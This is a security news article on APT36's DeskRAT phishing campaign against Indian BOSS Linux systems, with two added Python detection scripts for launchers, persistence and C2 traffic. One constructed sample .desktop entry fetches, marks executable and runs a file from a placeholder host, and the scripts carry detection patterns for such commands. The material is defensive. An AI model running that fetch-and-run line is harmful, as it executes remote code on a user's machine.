Pakistan-linked attackers have been observed targeting Indian government agencies in a spear-phishing campaign designed to deliver Golang-based malware.
The activity, which Sekoia observed in August and September 2025, is believed to be the work of Transparent Tribe (also known as APT36), a state-sponsored hacking group known to have been active since at least 2013. This activity also builds on a previous campaign unveiled by CYFIRMA in August 2025.
The attack chain begins with a phishing email carrying a ZIP file attachment; in some cases the email instead links to archives hosted on legitimate cloud services such as Google Drive. Inside the ZIP file is a malicious .desktop file whose launch command uses Mozilla Firefox to display a decoy PDF (‘CDS_Directive_Armed_Forces.pdf’) while simultaneously executing the main payload.
Both artifacts are fetched from the external server ‘modgovindia(.)com’ and executed. As in the earlier campaign, this activity is designed to target BOSS (Bharat Operating System Solutions) Linux systems and uses a remote access trojan, dubbed DeskRAT by Sekoia, that establishes command-and-control (C2) over WebSockets.
The malware supports four persistence methods: creating a systemd service, setting up a cron job, placing a launcher in the Linux autostart directory (‘$HOME/.config/autostart’), and modifying .bashrc so that it starts the trojan through a shell script written to ‘$HOME/.config/system-backup/’.
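The lure-and-launch .desktop file and the four persistence locations above are all things a responder can check on a suspect BOSS Linux host. The following Python is an added example, not Sekoia's tooling and not the malware's code: the directory names come from the write-up, the Exec= heuristics (a decoy viewer chained with a second command, a remote fetch, a chmod, a `sh -c` wrapper) are my assumptions, and every sample input is constructed rather than a captured artifact.

```python
"""Hunt for a decoy-plus-payload .desktop file and for launchers that point
at the staging or autostart directories named in the report.  Added example;
heuristics are assumptions and all SAMPLE_* inputs are constructed."""
import re
from pathlib import Path
from typing import Dict, List, Optional

# Directories named in the write-up, relative to $HOME.
AUTOSTART_DIR = ".config/autostart"
STAGING_DIR = ".config/system-backup"

# Detection heuristics (assumptions, not indicators from the report).
DECOY_VIEWERS = ("firefox", "xdg-open", "evince")
FETCHERS = ("curl", "wget")
CHAIN_RE = re.compile(r"&&|\|\||;|&|\|")
URL_RE = re.compile(r"https?://", re.I)
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")
SHELL_C_RE = re.compile(r"\b(ba|da)?sh\s+-c\b")


def parse_desktop_exec(desktop_text: str) -> Optional[str]:
    """Return the Exec= value of a .desktop file, or None if it has none."""
    for line in desktop_text.splitlines():
        if line.startswith("Exec="):
            return line[len("Exec="):].strip()
    return None


def assess_exec(exec_value: str) -> List[str]:
    """Reasons an Exec= line looks like a decoy-plus-payload launcher."""
    low = exec_value.lower()
    reasons = []
    if any(v in low for v in DECOY_VIEWERS) and CHAIN_RE.search(low):
        reasons.append("decoy viewer chained with another command")
    if any(f in low for f in FETCHERS) and URL_RE.search(low):
        reasons.append("fetches content from a remote URL")
    if CHMOD_RE.search(low):
        reasons.append("marks a file executable")
    if SHELL_C_RE.search(low):
        reasons.append("wraps everything in a shell -c string")
    return reasons


def scan_launch_text(text: str) -> List[str]:
    """Non-comment lines of a .bashrc, `crontab -l` output or a systemd unit
    that reference the staging or autostart directories from the report."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and (STAGING_DIR in s or AUTOSTART_DIR in s):
            hits.append(s)
    return hits


def hunt_home(home: Path) -> Dict[str, List[str]]:
    """Run the checks over a real home directory (feed `crontab -l` output to
    scan_launch_text() separately; cron jobs are not files under $HOME)."""
    findings: Dict[str, List[str]] = {}
    for desktop in (home / AUTOSTART_DIR).glob("*.desktop"):
        exec_value = parse_desktop_exec(desktop.read_text(errors="replace"))
        reasons = assess_exec(exec_value) if exec_value else []
        if reasons:
            findings[str(desktop)] = reasons
    units = (home / ".config/systemd/user").glob("*.service")
    for launcher in [home / ".bashrc", *units]:
        if launcher.is_file():
            hits = scan_launch_text(launcher.read_text(errors="replace"))
            if hits:
                findings[str(launcher)] = hits
    return findings


# Constructed samples (not real artifacts); staging.example is a placeholder.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=CDS_Directive_Armed_Forces.pdf
Icon=application-pdf
Exec=bash -c "firefox /tmp/CDS_Directive_Armed_Forces.pdf & curl -s http://staging.example/x -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
"""
SAMPLE_BASHRC = """# constructed ~/.bashrc
export PATH="$HOME/bin:$PATH"
nohup bash "$HOME/.config/system-backup/update.sh" >/dev/null 2>&1 &
alias ll='ls -la'
"""
SAMPLE_CRONTAB = """# constructed `crontab -l` output
@reboot $HOME/.config/system-backup/update.sh
0 3 * * * /usr/local/bin/nightly-backup
"""
SAMPLE_UNIT = """[Unit]
Description=System backup (constructed)
[Service]
ExecStart=/bin/bash /home/user/.config/system-backup/update.sh
[Install]
WantedBy=default.target
"""

if __name__ == "__main__":
    print("desktop:", assess_exec(parse_desktop_exec(SAMPLE_DESKTOP) or ""))
    for name, text in (("bashrc", SAMPLE_BASHRC), ("crontab", SAMPLE_CRONTAB), ("unit", SAMPLE_UNIT)):
        print(f"{name}:", scan_launch_text(text))
    print("live home:", hunt_home(Path.home()))
```

The Exec= check is deliberately structural rather than signature-based: a legitimate launcher such as `firefox %u` produces no findings, while any entry that opens a viewer and in the same line fetches, chmods or runs something else is flagged regardless of the hostname it contacts.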
DeskRAT supports five commands:
- ping: sends a JSON message containing “pong” and the current timestamp to the C2 server.
- heartbeat: sends a JSON message containing “heartbeat_response” and a timestamp.
- list_files: sends a directory listing.
- start_collection: searches for files that match a predefined set of extensions and are smaller than 100 MB, and sends them to the C2 server.
- upload_execute: drops and runs additional Python, shell, or desktop payloads.
“DeskRAT’s C2 server is named as a stealth server,” the French cybersecurity firm said. “In this context, a stealth server refers to a name server that does not appear in the publicly visible NS records of the associated domain.”
“While initial campaigns leveraged legitimate cloud storage platforms such as Google Drive to distribute malicious payloads, TransparentTribe has now moved to using dedicated staging servers.”
The findings follow a report from QiAnXin XLab, which details a campaign targeting Windows endpoints with a Golang backdoor tracked as StealthServer through phishing emails with booby-trapped desktop file attachments, suggesting a cross-platform focus.
It’s worth noting that there are three variants of StealthServer for Windows.
- StealthServer Windows V1 (observed in July 2025) employs several anti-analysis and anti-debugging techniques to evade detection. It establishes persistence through scheduled tasks, PowerShell scripts dropped in the Windows Startup folder, and Windows registry changes, and communicates with the C2 server over TCP to enumerate files and upload or download specific ones.
- StealthServer Windows V2 (observed in late August 2025) retains the same functionality but adds new anti-debugging checks for tools such as OllyDbg, x64dbg, and IDA.
- StealthServer Windows V3 (observed in late August 2025) switches to WebSockets for communication and has the same functionality as DeskRAT.
XLab said it also observed two Linux variants of StealthServer. One is DeskRAT, which supports an additional command called “welcome.” The second Linux variant uses HTTP instead of WebSockets for C2 communication and supports three commands:
- browse: enumerates the files in the specified directory.
- upload: uploads the specified file.
- execute: runs a bash command.
It also recursively searches the root directory (‘/’) for files matching a set of extensions and sends any it finds, in encrypted form, via an HTTP POST request to ‘modgovindia(.)space:4000’. This suggests the HTTP variant is an earlier iteration of DeskRAT, since the latter moves that behaviour into a dedicated “start_collection” command.
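The two network behaviours that distinguish these Linux variants, bulk HTTP POST uploads to port 4000 on the reported staging domain and a WebSocket (HTTP 101 upgrade) channel for C2, are both visible in proxy or NSM logs. The following Python is an added example, not XLab's or Sekoia's tooling: the tab-separated log format and every line in SAMPLE_LOG are constructed, the defanged domains are the two printed above, and treating any host under the modgovindia label as a sibling of that infrastructure is my assumption (the page itself shows the label reused across .com and .space).

```python
"""Flag HTTP POST uploads to port 4000 on the reported staging domain and
HTTP 101 upgrades (WebSocket C2) in a connection log.  Added example; the
log format and SAMPLE_LOG are constructed, sibling-TLD matching is assumed."""
import csv
import io
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Defanged indicators exactly as printed in the write-up above.
REPORTED_DOMAINS = ("modgovindia(.)com", "modgovindia(.)space")
EXFIL_PORT = 4000


def refang(indicator: str) -> str:
    """Turn a defanged domain back into a hostname that can be matched."""
    return indicator.replace("(.)", ".").replace("[.]", ".").lower()


C2_DOMAINS = {refang(d) for d in REPORTED_DOMAINS}
# Assumption: the actor reuses the same label under further TLDs or subdomains.
C2_LABEL_RE = re.compile(r"(^|\.)modgovindia\.[a-z]{2,}$")


@dataclass
class Finding:
    ts: str
    src: str
    host: str
    reason: str


def classify(rec: Dict[str, str]) -> List[str]:
    """Reasons one log record matches the reported tradecraft (empty if none)."""
    host = rec["host"].lower()
    reasons = []
    if host in C2_DOMAINS:
        reasons.append("reported staging/C2 domain")
    elif C2_LABEL_RE.search(host):
        reasons.append("sibling of reported staging domain")
    body = int(rec["req_body_len"])
    if rec["method"].upper() == "POST" and int(rec["port"]) == EXFIL_PORT and body > 0:
        reasons.append(f"{body}-byte POST to port {EXFIL_PORT} (file upload pattern)")
    if int(rec["status"]) == 101:
        reasons.append("HTTP 101 Switching Protocols (WebSocket channel)")
    return reasons


def scan_log(tsv_text: str) -> List[Finding]:
    """Parse a header-led TSV export and return one Finding per matched reason."""
    reader = csv.DictReader(io.StringIO(tsv_text), delimiter="\t")
    return [Finding(r["ts"], r["src"], r["host"], why)
            for r in reader for why in classify(r)]


def findings_by_source(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per internal source address to prioritise triage."""
    return dict(Counter(f.src for f in findings))


# Constructed sample, not captured traffic: ts, src, method, host, port, uri,
# response status and request body length.
SAMPLE_LOG = "\n".join([
    "ts\tsrc\tmethod\thost\tport\turi\tstatus\treq_body_len",
    "2025-09-02T09:14:03Z\t10.20.1.15\tGET\tmodgovindia.com\t443\t/\t101\t0",
    "2025-09-02T09:14:05Z\t10.20.1.15\tPOST\tmodgovindia.space\t4000\t/\t200\t524288",
    "2025-09-02T09:15:00Z\t10.20.1.22\tGET\twww.example.org\t443\t/\t200\t0",
    "2025-09-02T09:16:10Z\t10.20.1.15\tPOST\tcdn.modgovindia.net\t4000\t/\t200\t1024",
    "2025-09-02T09:17:30Z\t10.20.1.22\tPOST\twww.example.org\t443\t/\t200\t2048",
]) + "\n"

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> {f.host}: {f.reason}")
    print(findings_by_source(scan_log(SAMPLE_LOG)))
```

The domain match and the behavioural matches are kept as separate reasons on purpose: if the actor rotates to a fresh staging server, the port-4000 POST and the 101 upgrade still fire on their own, and a host that only matches the domain list still surfaces even before any upload is seen.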

“This group’s operations are frequent and characterized by a wide variety of tools, numerous variations, and high frequency of delivery,” said QiAnXin XLab.
Attacks from other South and East Asian threat clusters
The development comes amid the discovery of various campaigns orchestrated by South Asia-focused threat actors in recent weeks.
- A phishing campaign by Bitter APT targeting the government, power, and military sectors in China and Pakistan. It uses malicious Microsoft Excel attachments or RAR archives exploiting CVE-2025-8088 (a WinRAR path traversal flaw), ultimately dropping a C# implant named ‘cayote.log’ that collects system information and executes arbitrary executables received from an attacker-controlled server.
- A new wave of targeted activity by SideWinder aimed at the maritime sector and other industries in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar. It uses credential-harvesting portals and weaponized lure documents to distribute multi-platform malware as part of an “intensive” campaign codenamed Operation Southnet.
- An attack campaign by the Vietnam-aligned hacking group known as OceanLotus (also tracked as APT-Q-31) that deploys the Havoc post-exploitation framework against businesses and government departments in China and neighboring Southeast Asian countries.
- An attack campaign by Mysterious Elephant (aka APT-K-47) in early 2025. Using a combination of exploit kits, phishing emails, and malicious documents, the group relied on PowerShell scripts that drop BabShell (a C++ reverse shell) to gain initial access to government and diplomatic departments in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka. It then deployed MemLoader HidenDesk (a loader that executes the Remcos RAT payload in memory) and MemLoader Edge (another loader that embeds VRat, a variant of the open-source vxRat).
Notably, these intrusions also focused on stealing WhatsApp communications from compromised hosts using a number of modules (i.e. Uplo Exfiltrator and Stom Exfiltrator) that specialize in capturing various files exchanged through the popular messaging platform.
Another tool used by threat actors is ChromeStealer Exfiltrator. As the name suggests, it can collect cookies, tokens, and other sensitive information from Google Chrome as well as siphon files related to WhatsApp.
The disclosure paints a picture of a hacking group that has evolved into a sophisticated threat operation, one that not only borrows tools from other threat actors but also uses its own custom malware. The adversary is known to have tactical overlaps with Origami Elephant, Confucius, and SideWinder, all of which are assessed to operate in alignment with Indian interests.
“Mysterious Elephant is a highly sophisticated and active advanced persistent threat group that poses a significant threat to government and diplomatic sectors in the Asia-Pacific region,” Kaspersky said. “The use of custom-made open source tools such as BabShell and MemLoader highlights the technical expertise and willingness to invest in the development of advanced malware.”